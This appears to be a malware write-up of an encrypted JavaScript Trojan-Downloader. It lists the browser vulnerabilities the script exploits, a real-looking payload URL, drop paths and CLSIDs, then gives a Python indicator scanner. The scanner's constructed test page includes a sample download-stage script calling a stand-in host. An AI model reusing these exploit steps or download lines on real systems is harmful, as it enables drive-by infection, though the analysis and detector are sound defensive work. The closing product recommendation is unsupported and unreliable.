
Trojan-Downloader

A Trojan-Downloader is a variant of Trojan that downloads another program from the Internet and launches it on the victim's machine without the user's knowledge or consent. This particular Trojan-Downloader is an encrypted JavaScript embedded in an HTML document and is 14147 bytes in size.

The Trojan-Downloader activates when the infected page is opened in a web browser. An infected page gives itself away by displaying only the following decoy text, which imitates a web server error page, while the script executes:

Not Found
The requested URL / was not found on this server.

The Trojan then decrypts its body and launches the malicious script. The script exploits the following vulnerabilities:

  1. a buffer overflow in the Live Picture Corporation DXSurface.LivePicture.FlashPix.1 ActiveX control in DXTLIPI.DLL when processing SourceUrl() (CVE-2007-4336);
  2. a vulnerability in the Windows Media Player plug-in when processing an excessively long src parameter in the embed tag (MS06-006); this vulnerability is exposed only when the plug-in is launched in browsers other than Internet Explorer;
  3. a vulnerability in the QuickTime.QuickTime ActiveX object (CVE-2004-0431).

These exploits are used to download a file named ldr.exe from the URL shown below:

http://java62.com/load.php****

This file is 48640 bytes in size and is detected by Kaspersky Anti-Virus as Backdoor.Win32.Agent.ich. It is saved to the Windows system directory under the following name:

%System%\~.exe

The file is then launched for execution. The Trojan next uses the Msxml2.XMLHTTP ActiveX object together with the COM objects registered in the system registry under the following CLSIDs:

{BD96C556-65A3-11D0-983A-00C04FC29E30}
{BD96C556-65A3-11D0-983A-00C04FC29E36}
{AB9BCEDD-EC7E-47E1-9322-D4A210617116}
{0006F033-0000-0000-C000-000000000046}
{0006F03A-0000-0000-C000-000000000046}
{6E32070A-766D-4EE6-879C-DC1FA91D2FC3}
{6414512B-B978-451D-A0D8-FCFDF33E833C}
{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}
{06723E09-F4C2-43C8-8358-09FCD1DB0766}
{639F725F-1B2D-4831-A9FD-874847682010}
{BA018599-1DB3-44F9-83B4-461454C84BF8}
{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}
{E8CCCDDF-CA28-496B-B050-6C07C962476B}

These objects are used to download a file named ldr.exe from the link shown below:

http://java62.com/load.php?MSIE

The Trojan uses the ADODB.Stream ActiveX object to save this file under the following name:

c:\sys<rnd>.exe

where rnd is four random Latin letters, for example:

syskmtz.exe
syskqoq.exe

The downloaded file will then be launched for execution.
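The indicators listed above (the ProgIDs the script instantiates, the CLSIDs it looks up, the oversized embed src needed for MS06-006, and the decoy "Not Found" text) are enough for a static triage pass over a suspect HTML page. The following Python script is an added example and is not code from the original post or from any vendor. It peels percent-encoded unescape() layers before matching, which is an assumption: the page says only that the script is "encrypted", not which scheme it uses, so a different encoder needs its own decoding step. The sample page, the example.invalid URL and the 1024-byte src threshold are constructed for the example.

```python
import re
from urllib.parse import unquote

# Indicators taken from the description above (ProgIDs and CLSIDs the script uses).
KNOWN_PROGIDS = {
    "DXSurface.LivePicture.FlashPix.1": "LivePicture FlashPix ActiveX overflow (CVE-2007-4336)",
    "QuickTime.QuickTime": "QuickTime ActiveX object (CVE-2004-0431)",
    "Msxml2.XMLHTTP": "HTTP download of the second stage",
    "ADODB.Stream": "writing the downloaded file to disk",
}
KNOWN_CLSIDS = {
    "BD96C556-65A3-11D0-983A-00C04FC29E30", "BD96C556-65A3-11D0-983A-00C04FC29E36",
    "AB9BCEDD-EC7E-47E1-9322-D4A210617116", "0006F033-0000-0000-C000-000000000046",
    "0006F03A-0000-0000-C000-000000000046", "6E32070A-766D-4EE6-879C-DC1FA91D2FC3",
    "6414512B-B978-451D-A0D8-FCFDF33E833C", "7F5B7F63-F06F-4331-8A26-339E03C0AE3D",
    "06723E09-F4C2-43C8-8358-09FCD1DB0766", "639F725F-1B2D-4831-A9FD-874847682010",
    "BA018599-1DB3-44F9-83B4-461454C84BF8", "D0C07D56-7C69-43F1-B4A0-25F5A11FAB19",
    "E8CCCDDF-CA28-496B-B050-6C07C962476B",
}
DECOY_404 = "The requested URL / was not found on this server."
EMBED_SRC_MAX = 1024  # assumption: no legitimate <embed src> is this long; MS06-006 needs an oversized one

GUID_RE = re.compile(r"[0-9A-F]{8}-(?:[0-9A-F]{4}-){3}[0-9A-F]{12}", re.I)
UNESCAPE_RE = re.compile(r"""unescape\(\s*(["'])((?:%[0-9A-Fa-f]{2}|[^"'])*)\1\s*\)""")
EMBED_RE = re.compile(r"""<embed\b[^>]*?\bsrc\s*=\s*(["'])(.*?)\1""", re.I | re.S)
LOADER_RE = re.compile(r"\b(?:eval|document\.write)\s*\(\s*(?:unescape|decodeURIComponent|String\.fromCharCode)\b", re.I)


def decode_unescape_layers(text, max_depth=5):
    """Return [original, decoded-1, decoded-2, ...] by peeling unescape("%XX..") literals.
    Assumption: percent-encoding via JavaScript unescape(); the page only says the
    script is 'encrypted', so any other scheme needs its own decoder here."""
    layers = [text]
    for _ in range(max_depth):
        decoded = [unquote(m.group(2)) for m in UNESCAPE_RE.finditer(layers[-1])]
        if not decoded:
            break
        layers.append("\n".join(decoded))
    return layers


def scan_html(html):
    """Report every indicator from the description found in any decoding layer."""
    findings = set()
    for depth, layer in enumerate(decode_unescape_layers(html)):
        where = f"layer {depth}"
        for progid, why in KNOWN_PROGIDS.items():
            if re.search(r"""ActiveXObject\(\s*["']""" + re.escape(progid) + r"""["']""", layer, re.I):
                findings.add(f"{where}: ActiveXObject({progid}) - {why}")
        for guid in GUID_RE.findall(layer):
            if guid.upper() in KNOWN_CLSIDS:
                findings.add(f"{where}: known exploit CLSID {{{guid.upper()}}}")
        for m in EMBED_RE.finditer(layer):
            if len(m.group(2)) > EMBED_SRC_MAX:
                findings.add(f"{where}: <embed src> of {len(m.group(2))} bytes (MS06-006 pattern)")
        if DECOY_404 in layer:
            findings.add(f"{where}: decoy 'Not Found' body text")
        if LOADER_RE.search(layer):
            findings.add(f"{where}: eval/document.write of a decoded string (loader pattern)")
    return sorted(findings)


def _percent_encode(s):
    """JavaScript unescape()-compatible encoding for the constructed sample."""
    return "".join("%%%02X" % ord(c) for c in s)


# Constructed test page, not the real sample: decoy 404 text, an oversized <embed src>,
# and a percent-encoded inner script that uses the ProgIDs and one CLSID listed above.
INNER_SCRIPT = (
    'var x = new ActiveXObject("Msxml2.XMLHTTP");\n'
    'x.open("GET", "http://example.invalid/load.php?MSIE", false);\n'
    'var s = new ActiveXObject("ADODB.Stream");\n'
    "document.write('<object classid=\"clsid:{BD96C556-65A3-11D0-983A-00C04FC29E36}\"></object>');\n"
)
SAMPLE_HTML = (
    "<html><body>Not Found\n" + DECOY_404 + "\n"
    '<embed src="' + "A" * 2000 + '" type="application/x-mplayer2">\n'
    '<script>eval(unescape("' + _percent_encode(INNER_SCRIPT) + '"));</script>'
    "</body></html>"
)

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_HTML):
        print(finding)
```

Run against the constructed page, the scan reports the decoy text, the 2000-byte embed src and the eval(unescape()) loader at layer 0, and the Msxml2.XMLHTTP and ADODB.Stream objects plus the BD96C556-...-00C04FC29E36 CLSID at layer 1, which is the order in which the description above says the infection proceeds. A page that produces no hits is not thereby clean: if the outer layer uses an encoding this decoder does not peel, none of the layer-1 indicators become visible, so treat a page that only trips the loader pattern as worth a manual look.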

To protect your computer from Trojan-Downloader, you need to install Shield Deluxe and Security Shield.
